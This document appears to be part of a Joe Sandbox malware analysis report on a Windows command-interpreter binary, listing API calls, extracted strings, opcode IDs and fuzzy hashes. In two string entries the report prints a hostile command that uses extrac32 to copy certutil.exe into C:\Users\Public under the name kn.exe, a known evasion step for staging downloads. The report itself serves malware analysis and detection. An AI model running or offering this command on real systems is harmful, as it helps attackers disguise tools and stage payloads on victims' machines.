                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$EnvironmentVariable
                                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                          • API String ID: 198002717-267741548
                                                                                                          • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                          • Instruction ID: 0c8f972cece2aa3c170077d63e7f45d57bc5834901acecf6befa7d7d5e343c88
                                                                                                          • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                                          • Instruction Fuzzy Hash: 1A514F21A0A64286F6556B1DF854279FA90BF49B88FD69175C94E03678EF3CE0488360
                                                                                                          APIs
                                                                                                          • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F000
                                                                                                          • wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F031
                                                                                                          • iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswdigitiswspacewcschr
                                                                                                          • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                                          • API String ID: 1595556998-2755026540
                                                                                                          • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                          • Instruction ID: 1870dbb0b25e24ca83d9c094d5b22b03a32a59e301fa8cb2419b7669c19a9978
                                                                                                          • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                                                                                          • Instruction Fuzzy Hash: DB22A665E0A656C1FA667B1DF45027AE7A0BF05B9CFC24232D98D422F4DF3CA4418BB1
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                                          • String ID: "$=,;
                                                                                                          • API String ID: 3545743878-4143597401
                                                                                                          • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                          • Instruction ID: 4b8e6a581885ae599b69257fa53de78db3b690aa0722705da2992bad004a81d5
                                                                                                          • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                                                                                          • Instruction Fuzzy Hash: 2DC16E65E0A752C2EB666B19F000379F6A1FF49F4CF969535CA5E033B4EF3CA4558220
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                          • API String ID: 2411632146-3173542853
                                                                                                          • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                          • Instruction ID: 9b78d5002aba438a240acff03f1573acac0dc6a93240a4af8df302609cc6ce53
                                                                                                          • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                                                                                          • Instruction Fuzzy Hash: AF616EB1A0A64281EA26EF59F5446B5E7A4FF44B8CFC60136DA4D13778EF3DE5408720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile_open_osfhandle
                                                                                                          • String ID: con
                                                                                                          • API String ID: 2905481843-4257191772
                                                                                                          • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                          • Instruction ID: bde267dc46d48ffbdd9cb0ca24ac719aa8791bb5cef00da066818c02bd16ac25
                                                                                                          • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                          • Instruction Fuzzy Hash: AE71E9326096818AE762AF1CF440279F690FB4AB68F914334DA6E437B4EF3CD549CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3829876242-3916222277
                                                                                                          • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                          • Instruction ID: 7d70dc850457491f94122b8e32fd4bb32d78e782e0ea171d13f2f0d496277b09
                                                                                                          • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                                                                                          • Instruction Fuzzy Hash: F8619422A066428AE616AF19F454179F7A1FF89B98F86D234DE0E077B4FF3CE5058710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                                          • API String ID: 3510147486-2605508654
                                                                                                          • Opcode ID: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                          • Instruction ID: 1731e140f8bf1dcf85007dc00e6f2f9e1878d0dec96b8fe6c35e1f30ab3d5c33
                                                                                                          • Opcode Fuzzy Hash: 25656f9dd7156011cddd26e1f63935c756ad3329fe6ff4f37f6319205113c483
                                                                                                          • Instruction Fuzzy Hash: 22616332705BC28AEB669F29E8843E9B7A4FB45B49F854139CA0E4B778DF78D104C710
                                                                                                          APIs
                                                                                                          • longjmp.MSVCRT(?,00000000,00000000,00007FF7AB127279,?,?,?,?,?,00007FF7AB12BFA9), ref: 00007FF7AB144485
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: longjmp
                                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                          • API String ID: 1832741078-366822981
                                                                                                          • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                          • Instruction ID: eb9c5839559ce4c79cab41ad6ee8e3180e72304171eb615e809967d33161eb89
                                                                                                          • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                          • Instruction Fuzzy Hash: 67C1B5A4F0E642C1E626FB1DF1905B9D391AB46B8CFD20032CD0E576B2DF2CA9468360
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • memset.MSVCRT ref: 00007FF7AB12BA2B
                                                                                                          • wcschr.MSVCRT ref: 00007FF7AB12BA8A
                                                                                                          • wcschr.MSVCRT ref: 00007FF7AB12BAAA
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Heapwcschr$AllocProcessmemset
                                                                                                          • String ID: -$:.\$=,;$=,;+/[] "
                                                                                                          • API String ID: 2872855111-969133440
                                                                                                          • Opcode ID: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                          • Instruction ID: 91af18aa1b5f12ff6d5f6ba223f97fa847e545f2acb0830da42af62c009d0956
                                                                                                          • Opcode Fuzzy Hash: e048727378a3460f555082e81c55544313692faeaf2a868744a414ec58a8adda
                                                                                                          • Instruction Fuzzy Hash: 35B18226A0E642C1EA66AB1DF1C427AE690FF44B98FC74235CA5E437B4DF3DE4459320
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                                                          • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                          • API String ID: 1606811317-2340392073
                                                                                                          • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                          • Instruction ID: 0b012d0c77d824589ceca6df754b02bcd46a2b1501e2e1f0570f6ddfc5952729
                                                                                                          • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                                                          • Instruction Fuzzy Hash: 59D1BF21A0AA4682EB56AB1CF8142B9A7A0FF45B9CFC64231DE5D437B4DF3CE415C760
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                          • String ID: %04X-%04X$~
                                                                                                          • API String ID: 2748242238-2468825380
                                                                                                          • Opcode ID: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                          • Instruction ID: 8d6f34be8a24cf2cbd5a1aed1727df300132b9da88ea475e6a3e8d1fea724469
                                                                                                          • Opcode Fuzzy Hash: 527acd2d5873e217b6583c2a0f855b60256f074d3be57f79744cf5756af0c24e
                                                                                                          • Instruction Fuzzy Hash: C5A1B532709BC1CAEB669F28E8442E9B7A1FB85788F818135DA4D4B778DF3CD6458710
                                                                                                          APIs
                                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7AB136570,?,?,?,?,?,?,00000000,00007FF7AB136488), ref: 00007FF7AB136677
                                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7AB136570,?,?,?,?,?,?,00000000,00007FF7AB136488), ref: 00007FF7AB13668F
                                                                                                          • _errno.MSVCRT ref: 00007FF7AB1366A3
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB1366C4
                                                                                                          • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7AB136570,?,?,?,?,?,?,00000000,00007FF7AB136488), ref: 00007FF7AB1366E4
                                                                                                          • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7AB136570,?,?,?,?,?,?,00000000,00007FF7AB136488), ref: 00007FF7AB1366FE
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                          • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                          • API String ID: 2348642995-441775793
                                                                                                          • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                          • Instruction ID: 7c007406909481bc28d7e4f5945bc1704bfdc123b3062a511cea8045458d3f71
                                                                                                          • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                          • Instruction Fuzzy Hash: 8A714262D0EA46C5E7A66F19E45017DF7A0FB45B88BD69131DA4E062B8FF3C9488C720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                                                          • String ID: FAT$~
                                                                                                          • API String ID: 2238823677-1832570214
                                                                                                          • Opcode ID: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                          • Instruction ID: 96403666c4749ba540662d175d16a6eb545c3ce6f73359de305acbeb7d602438
                                                                                                          • Opcode Fuzzy Hash: 9870e3df3003cca21a2b5bb6f1f08ea82d43fbeeb1162d01b560e5e2cc2d055c
                                                                                                          • Instruction Fuzzy Hash: 83719272609BC1C9EB629F28E8502E9B7A4FB45788F814135DA4D4B778EF38D249C710
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D884
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D89D
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D94D
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12D964
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB12DB89
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB12DBDF
                                                                                                          • wcstol.MSVCRT ref: 00007FF7AB12DC63
                                                                                                          • memmove.MSVCRT ref: 00007FF7AB12DD33
                                                                                                          • memmove.MSVCRT ref: 00007FF7AB12DE9A
                                                                                                          • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF7AB12FE2A), ref: 00007FF7AB12DF1F
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1051989028-0
                                                                                                          • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                          • Instruction ID: 8ba498fae1b2371dcddc441a8f9e9a99b3acfe04663ae6fb0efa6d630bfb9925
                                                                                                          • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                                                                                          • Instruction Fuzzy Hash: EC028136A0AB45C2EA26AF18F440279B6A1FB45B98F964635DA8D037F4DF3CD461C720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                          • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                          • API String ID: 3223794493-3086019870
                                                                                                          • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                          • Instruction ID: 1e7c90a199c01d1893acf3883e05c2c2c04aa47bd4dae62dffb0b5389bba23d5
                                                                                                          • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                                                          • Instruction Fuzzy Hash: 2D518135A0A742C6EA56AB1DF450179BBA0FF49B98F968234C95E033B4EF3DE445C720
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                          • API String ID: 0-3124875276
                                                                                                          • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                          • Instruction ID: b64bd52a78cd404e0ba2859732af14aeaa9009bac675468b1eac89fd778c7f9a
                                                                                                          • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                                                          • Instruction Fuzzy Hash: 45517120A0E64381FB9A7F2DF4402B8B690AF4574CFD68135C65E462B4EF3CA44C87B0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7AB14C6DB), ref: 00007FF7AB1358EF
                                                                                                            • Part of subcall function 00007FF7AB13081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB13084E
                                                                                                          • towupper.MSVCRT ref: 00007FF7AB14C1C9
                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB14C31C
                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7AB14C5CB
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                                                          • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                                                                                          • API String ID: 2242554020-619615743
                                                                                                          • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                          • Instruction ID: 51b61ada0616fb2912d8d4d5ff31072aefd02c8469262afc8e608003db75f204
                                                                                                          • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                                                          • Instruction Fuzzy Hash: 1C12B161A0A64281EA66BB1DF44017AE7A0EF44BA8FD64335D95E037F0EF3CE546C720
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00007FF7AB137013
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB137123
                                                                                                            • Part of subcall function 00007FF7AB131EA0: wcschr.MSVCRT(?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7AB150D54), ref: 00007FF7AB131EB3
                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB13706E
                                                                                                          • wcsncmp.MSVCRT ref: 00007FF7AB1370A5
                                                                                                          • wcsstr.MSVCRT ref: 00007FF7AB13F9DB
                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB13FA00
                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB13FA5F
                                                                                                            • Part of subcall function 00007FF7AB13823C: FindFirstFileExW.KERNELBASE ref: 00007FF7AB138280
                                                                                                            • Part of subcall function 00007FF7AB13823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB13829D
                                                                                                            • Part of subcall function 00007FF7AB133A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB14EAC5,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB133A56
                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB13FA3D
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                          • String ID: \\.\
                                                                                                          • API String ID: 799470305-2900601889
                                                                                                          • Opcode ID: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                          • Instruction ID: 2a408c0f794547d38104cd1bf3c77778a4f4d13a7a1bd92ee321f3d0369c4a83
                                                                                                          • Opcode Fuzzy Hash: 1d9e630e3dc056cac36988160209897b6a55c82e5470b3b56a9f5e981f117f56
                                                                                                          • Instruction Fuzzy Hash: F551EF32A0AA82C5EBA69F19F4406B9F7E0FB45B48F864535D94E077B4EF3CD5498310
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1944892715-0
                                                                                                          • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                          • Instruction ID: 3ebd3804370bf2151da4c82f5d8c43610e0c120a3cb38b8f0279a25fa2781187
                                                                                                          • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                                                          • Instruction Fuzzy Hash: 6EB18661A0B646C6EA66BF19F490179EAA0FF45B88FC64535CA4E473F1EF3DE4448320
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1254DE
                                                                                                          • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB12552B
                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB12554F
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB14345F
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB14347E
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB1434C3
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1434DB
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7AB121F7D), ref: 00007FF7AB1434FA
                                                                                                            • Part of subcall function 00007FF7AB1336EC: _get_osfhandle.MSVCRT ref: 00007FF7AB133715
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB133770
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133791
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1356649289-0
                                                                                                          • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                          • Instruction ID: aef350adcae6c8477f281f823c263277b3dda1989b282d116914e2e0830a25c0
                                                                                                          • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                                                          • Instruction Fuzzy Hash: 08919172A0A642C7EB16AF19F440179F6A1FB89B88F8A4135DA4E477B4EF3CD440CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                          • String ID: %s$/-.$:
                                                                                                          • API String ID: 1644023181-879152773
                                                                                                          • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
